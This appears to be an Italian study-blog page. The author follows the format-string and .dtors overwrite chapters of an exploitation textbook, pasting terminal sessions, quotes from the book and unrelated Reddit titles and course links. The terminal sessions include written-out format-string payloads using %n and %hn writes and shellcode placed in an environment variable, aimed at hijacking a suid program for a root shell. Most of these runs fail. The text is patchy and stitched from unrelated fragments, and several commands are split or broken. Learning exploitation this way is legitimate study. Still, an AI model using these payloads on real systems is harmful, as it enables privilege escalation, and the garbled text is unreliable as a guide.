lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln2 $(printf “\xf4\x97\x04\x08JUNK\xf5\
x97\x04\x08JUNK\xf6\x97\x04\ x08JUNK\xf7\x97\x04\x08”)%x%x%161x%n%222x%n
bash: ./fmt_vuln2: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0x06 – 0xab”
$1 = -165
$1 = -165
bash: =: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0x106 – 0xab”
$1 = 91
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln2 $(printf “\xf4\x97\x04\
x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\ x08JUNK\xf7\x97\x04\
x08”)%x%x%161x%n%222x%n%91x%n
bash: ./fmt_vuln2: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$
A ogni scrittura vengono sovrascritti dei byte della variabile next_val,
adiacente a test_val. La tecnica del wrapping sembra funzionare bene, ma
con l’ultima scrittura sorge un piccolo problema
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0x08 – 0x06”
$1 = 2
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln2 $(printf “\xf4\x97\x04\x08JUNK\xf5\
x97\x04\x08JUNK\xf6\x97\x04\ x08JUNK\xf7\x97\x04\x08”)%x%x%161x%n%222x%n%9
1x%n%2x%n
bash: ./fmt_vuln2: File o directory non esistente
bash: 1x%n%2x%n: comando non trovato..
pag. 253
Che cos’è successo qui? La differenza tra 0x06 e 0x08 è solo di due,
ma vengono prodotti in uscita otto byte col risultato che il parametro di
formato %n scrive nel byte 0x0e. Il motivo di questo comportamento è
che l’opzione della larghezza di campo del parametro di formato %x
specifica solo la lunghezza minima e così ha stampato 8 byte di dati.
Questo problema può essere risolto con un’ulteriore operazione di
wrapping; in ogni caso è bene conoscere le limitazioni dell’opzione della
larghezza di campo.
Can someone explain about double and why it is only 8 bytes in size?
byu/thanosiscumming inlearnprogramming
informazioni complesse si memorizzano come sequenza di bite
http://www.star.dist.unige.it/~marco/AZZ-INFO/Data/lezione1.pdf
……
**********************************************************************************************
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
https://www.kea.nu/files/textbooks/humblesec/hacking_artofexploitation_2ndedition.pdf
pag. 259
0x357 Deviazioni con .dtors
Nei programmi binari compilati con il compilatore GNU C, vengono
create delle particolari sezioni per i distruttori e i costruttori, dette
rispettivamente .dtors e .ctors. Le funzioni costruttrici (dette
generalmente costruttori) vengono eseguite prima della funzione main(),
mentre quelle distruttrici (i distruttori) dopo che una funzione termina
con la chiamata di sistema ‘exit’. I distruttori e la relativa sezione .dtors
rivestono un particolare interesse per noi.
Una funzione puà essere dichiarata come distruttore definendola con
l’attributo destructor, come nel codice di dtors_sample.c
https://it.wikipedia.org/wiki/GNU_Compiler_Collection
https://www.fe.infn.it/u/spizzo/prog09/laboratorio/1_2_compilatore.pdf
*************
Linux From Scratch – Versione 5.1.1
Capitolo 5. Costruzione di un sistema provvisorio
http://www.pluto.it/files/ildp/lfs/lfs/5.1.1/chapter05/gcc-pass1.html
https://www.ibm.com/docs/it/i/7.5?topic=cbif-gcc-atomic-memory-access-built-in-functions-extension-c-only
************
Breve storia di gccc
Una introduzione a GCC
per i compilatori GNU gcc e g++
http://wpage.unina.it/agodemar/DSV-DQV/introgcc1_0.pdf
Gcc e make 1 How to… gcc e make
I passi della compilazione
https://www.docenti.unina.it/webdocenti-be/allegati/materiale-didattico/34115499
Pag 260
Nel codice precedente, la funzione cleanup() viene definita con
l’attributo destructor. Essa viene richiamata automaticamente quando
termina la funzione main():
lele@fedora:~/Scaricati/booksrc$ gcc -o dtors_sample dtors_sample.c
dtors_sample.c:6:1: error: return type defaults to ‘int’ [-Wimplicit-int]
6 | main() {
| ^~~~
lele@fedora:~/Scaricati/booksrc$ ./dtors_sample
bash: ./dtors_sample: File o directory non esistente
Il comportamento di eseguire automaticamente una funzione all’uscita
di un programma è controllato dalla sezione .dtors del file binario. Questa
è un array di indirizzi a 32 bit terminata da un indirizzo NULL. L’array
inizia sempre con 0xffffffff e termina con l’indirizzo NULL, ovvero
0x00000000. Tra questi delimitatori vengono inseriti tutti i puntatori alle
funzioni che sono state dichiarate con l’attributo destructor. Possiamo
utilizzare il comando nm per trovare l’indirizzo della funzione
cleanup(), quindi utilizzare objdump per esaminare le sezioni del file
binario.
https://www.diag.uniroma1.it/~liberato/tecniche/binari/index.shtml
https://it.wikipedia.org/wiki/Array
https://www.html.it/pag/15412/i-puntatori/
https://it.wikipedia.org/wiki/File_di_testo
codifica binaria dei numeri naturali
https://www.mat.unical.it/spataro/teaching/InformaticaChimica/dispensa_informatica.pdf
lele@fedora:~/Scaricati/booksrc$ nm ./dtors_sample
nm: “./dtors_sample”: questo file non esiste
Pag. 261
Il comando nm mostra che la funzione cleanup() si trova all’indirizzo
0x080483e8 (evidenziato in grassetto). Ci svela anche che la sezione
.dtors inizia all’indirizzo 0x080495ac con __DTOR_LIST__ ( ) e
termina all’indirizzo 0x080495b4 con __DTOR_END__ ( ). Questo
significa che 0x080495ac dovrebbe contenere 0xffffffff, 0x080495b4
dovrebbe contenere 0x00000000 e l’indirizzo compreso tra di essi
(0x080495b0) dovrebbe contenere il puntatore alla funzione cleanup()
(0x080483e8).
Il comando objdump visualizza il contenuto preciso della sezione .
dtors (in grassetto), anche se in un formato abbastanza confuso. Il primo
valore 80495ac mostra semplicemente l’indirizzo della sezione .dtors.
Poi vengono visualizzati i byte, invece delle DWORD, il che ne
comporta l’inversione per via dell’architettura little endian. Con questa
informazione tutto assume l’aspetto corretto.
lele@fedora:~/Scaricati/booksrc$ objdump -h ./dtors_sample
objdump: “./dtors_sample”: questo file non esiste
Pag 263
Un altro interessante dettaglio relativo alla sezione .dtors è che essa è
presente in tutti i file binari compilati con il compilatore GNU C, a
prescindere dal fatto che ci siano o meno funzioni dichiarate con
l’attributo destructor. Questo implica che il programma fmt_vuln.c deve
possedere una sezione .dtors vuota. Possiamo verificarlo con nm e
objdump.
http://www.pluto.it/files/ildp/HOWTO/Software-Building-HOWTO/Software-Building-HOWTO-3.html
https://forum.ubuntu-it.org/viewtopic.php?t=308718
http://www.pluto.it/files/journal/pj0301/c-c++.html
https://www.html.it/pag/15432/lutility-make-ed-i-makefile/
http://www.lia.deis.unibo.it/Courses/FondT1516-ELETLC/lucidi/16-File.pdf
************
Il processo di compilazione
https://www.fe.infn.it/u/spizzo/prog05/lezioni_laboratorio/lezione17.pdf
lele@fedora:~/Scaricati/booksrc$ nm ./fmt_vuln | grep DTOR
lele@fedora:~/Scaricati/booksrc$ objdump -s -j .dtors ./fmt_vuln
./fmt_vuln: formato del file elf64-x86-64
objdump: sezione “.dtors” menzionata in una opzione -j, ma non trovata in alcun file di input
Come si vede nell’output precedente, la distanza tra __DTOR_LIST__
e __DTOR_END__ è di soli quattro byte: non c’è alcun indirizzo tra
loro. Il dump ce lo conferma.
Dato che la sezione .dtors è scrivibile, se l’indirizzo che segue
0xffffffff viene sovrascritto con un puntatore valido, il flusso di
esecuzione del programma verrà dirottato a quel puntatore subito dopo la
chiamata di exit(). Questo sarà l’indirizzo di __DTOR_LIST__ più
quattro, ovvero 0x08049694 (che è anche l’indirizzo di
__DTOR_END__ in questo caso).
Se il programma è suid root e questo indirizzo viene sovrascritto,
diventa possibile ottenere una shell di root.
python
https://web.unica.it/unica/protected/159759/0/def/ref/MAT96384/
Sto leggendo un sacco di dati usando un’API e li sto assemblando in una struttura dati
Confused by how to write a class that is a data structure with associated methods
byu/CompanyCharabang inlearnpython
lele@fedora:~/Scaricati/booksrc$ export SHELLCODE=$(cat shellcode.bin)
lele@fedora:~/Scaricati/booksrc$ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0x7fff76cd5214
Pag 264
Possiamo inserire uno shellcode in una variabile d’ambiente e predirne
l’indirizzo come da manuale. Dato che la differenza di lunghezza tra i
nomi di getenvaddr.c e fmt_vuln.c è di due byte, all’esecuzione di
fmt_vuln.c lo shellcode si troverà all’indirizzo 0xbffff9ec. Questo
indirizzo dev’essere scritto nella sezione .dtors all’indirizzo 0x08049694
(in grassetto) utilizzando la vulnerabilità delle stringhe di formato.
Nell’output seguente utilizziamo il metodo delle short write
“Privilegi di uno shell generato?
Ciao a tutti.
Sono un principiante nell’exploit binario e sto lavorando su una sfida in cui devo generare uno shell (inserendo shellcode in una variabile d’ambiente) e leggere un file di password.”
*************
https://diraimondo.dmi.unict.it/wp-content/uploads/classes/so/1617/SO-tutorial-lab-unix-shell.pdf
lele@fedora:~/Scaricati/booksrc$ export SHELLCODE=$(cat shellcode.bin)
lele@fedora:~/Scaricati/booksrc$ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0x7fff76cd5214
lele@fedora:~/Scaricati/booksrc$
lele@fedora:~/Scaricati/booksrc$ gdb -q
(gdb) p 0xbfff – 8
$1 = 49143
(gdb) p 0xf9ec – 0xbfff
$2 = 14829
(gdb) quit
lele@fedora:~/Scaricati/booksrc$ nm ./fmt_vuln | grep DTOR
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln $(printf “\x96\x96\x04\x08\x94\x96\
x04\ x08″)%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
���x04\
The wrong way to print user-controlled input:
���x04\
[*] test_val @ 0x0040402c = -72 0xffffffb8
lele@fedora:~/Scaricati/booksrc$ whoami
lele
lele@fedora:~/Scaricati/booksrc$
Anche se la sezione .dtors non è conclusa correttamente con un
indirizzo NULL (0x00000000), l’indirizzo dello shellcode continua a
essere considerato un puntatore a una funzione distruttrice. All’uscita del
programma il flusso di esecuzione passa allo shellcode che produce una
shell di root
”
Se il dereferenziamento di un puntatore null è un errore di runtime, cosa sta succedendo qui?
So che sizeof non valuta il suo argomento, ma quando lo faccio
sizeof(((struct *)0)->struct_member)
Il nulla viene effettivamente dereferenziato? Oppure “finge” di dereferenziare il puntatore nullo?
Come funziona allora questa finzione?” ..”ma non danno fastidio”
If Dereferencing A Null Pointer Is A Runtime Error, What Is Happening Here?
byu/Basic-Definition8870 inC_Programming
https://forum.html.it/forum/showthread.php?threadid=623019
https://learn.microsoft.com/it-it/troubleshoot/windows-server/active-directory/dcpromo-demotion-fails
*****
Il termine byte, usato per indicare un gruppo di 8 bit, fu coniato da Werner Buchholz,
dell’Ibm, alla fine degli anni 50 per il computer 7030
pag. 280
https://maria2021.noblogs.org/files/2024/11/l-arte-dell-hacking-p.-280-socket.png